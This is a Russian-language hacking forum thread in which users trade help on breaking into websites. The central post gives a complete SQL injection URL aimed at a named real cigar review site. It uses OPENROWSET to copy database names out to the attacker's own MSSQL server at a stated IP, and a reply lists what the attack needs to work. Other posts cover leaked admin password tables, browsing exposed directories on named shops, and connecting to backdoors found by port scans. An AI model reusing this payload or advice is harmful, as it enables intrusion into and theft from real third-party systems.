ANTICHAT — форум по информационной безопасности, OSINT и технологиям

вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?

может осталась от чего-то. или просто бд тестили. или фейк. или для другого домена. есть много вариантов

Пробую сделать передачу данных через инжект на свой mssql-сервер. Но возникла проблема с моим принимающим сервером.

Купил windows-хостинг с выделенным ипом. Создал базу данных MSSQL 2005 с именем basename. Пользователь username с паролем password. Создал таблицу tbltest с колонкой pubs.

Посылаю запрос: http://www.top25cigar.com/reviewdatabase/product.asp?pkID=8797&showprod=yes&catpkID=315;ins ert+into+openrowset('sqloledb','uid=username;pwd=p assword;network=DBMSSOCN;Address=208.115.103.4','s elect+line+from+pubs..tbltest')+select+name+from+m aster..sysdatabases;--

В ответ получаю Cannot open user default database. Login failed. Хотя по умолчанию база данных установлена. Мне кажется, что ошибка где-то в правах доступа.

Что мне исправить? Ниже приложу несколько скриншотов из MSSQL Server Management Studio Express.

cyberia
1 акк корректен
2 твоя таблица создана и идентична по структуре
3 запрос без грамматических ошибок
4 есть права на чтение master..sysdatabases
Эти условия выполнены?
Помоеиу невыполнение ЛЮБОГО из условий не даст тебе ничего сделать.
Да , забыл, порт на котором твой сервер висит.
Имхо слишком много заморочек, но дело твоё конечно, проверь ВСЕ условия

Подскажите, что можно зделать есть маленький доступ

http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/
или это не чего не дает

2Hell0
Это дает только просмотр файлов и каталогов в данных директориях

Здравствуйте, разесните мне пожалуйста один момент, при сканировании портов утилитой Shadow Security Scanner 7, она показывает что на сервере открыто огромное количество портов, среди них очень много бекдоров, нахожу клиен к бекдору, но не один не коннектится, пробовал на разных сайтах, где открыты эти порты, ни чего не получилось.
XSpyder'ом пробывал сканить, тот вообще не работает, ни трафу не жрет, ни порты не сканирует, только нагрузку на проц создает. Помогите пожалуйста дельным советом.

Spaise
В чём вопрос то?
XSpyder не работает? Или открытые порты смущают?Огромное кол-во это сколько, и главное какие?С чего ты взял ,что "среди них очень много бекдоров", что за клиент к бекдору?

товарисчи напомните как вывести имя бд, для опр. таблицы, schema_name помню, а откуд забыл